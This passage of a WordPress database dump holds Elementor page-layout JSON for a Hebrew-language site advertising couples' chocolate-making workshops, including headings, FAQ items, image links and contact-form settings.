fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1301,262,'_elementor_version','0.4'),(1302,262,'_elementor_template_type','post'),(1305,263,'_wp_page_template','elementor_header_footer'),(1306,263,'_elementor_edit_mode','builder'),(1307,263,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1308,263,'_elementor_version','0.4'),(1309,263,'_elementor_template_type','post'),(1311,264,'_wp_page_template','elementor_header_footer'),(1312,264,'_elementor_edit_mode','builder'),(1313,264,'_elementor_template_type','post'),(1314,264,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_l